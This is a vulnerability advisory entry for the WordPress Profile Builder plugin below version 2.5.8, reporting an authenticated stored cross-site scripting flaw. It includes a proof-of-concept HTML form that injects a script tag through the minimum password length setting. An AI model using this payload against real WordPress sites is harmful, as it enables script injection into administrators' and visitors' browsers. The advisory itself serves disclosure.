WordPress Plugin Vulnerabilities
Profile Builder < 2.5.8 - Authenticated Stored Cross-Site Scripting (XSS)
Description
Stored Cross-Site Scripting (XSS) in field minimum password length.
Proof of Concept
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/wp/wp-admin/options.php" method="POST"> <input type="hidden" name="option_page" value="wppb_general_settings" /> <input type="hidden" name="action" value="update" /> <input type="hidden" name="_wpnonce" value="a37f914f93" /> <input type="hidden" name="_wp_http_referer" value="/wp/wp-admin/admin.php?page=profile-builder-general-settings" /> <input type="hidden" name="wppb_general_settings[extraFieldsLayout]" value="default" /> <input type="hidden" name="wppb_general_settings[emailConfirmation]" value="no" /> <input type="hidden" name="wppb_general_settings[activationLandingPage]" value="" /> <input type="hidden" name="wppb_general_settings[loginWith]" value="usernameemail" /> <input type="hidden" name="wppb_general_settings[minimum_password_length]" value="8"><script>alert(1)</script>" /> <input type="hidden" name="wppb_general_settings[minimum_password_strength]" value="strong" /> <input type="hidden" name="action" value="update" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Submitter
f3ci
Submitter website
Verified
No
WPVDB ID
Timeline
Publicly Published
2017-03-10 (about 7 years ago)
Added
2017-03-15 (about 7 years ago)
Last Updated
2020-11-26 (about 3 years ago)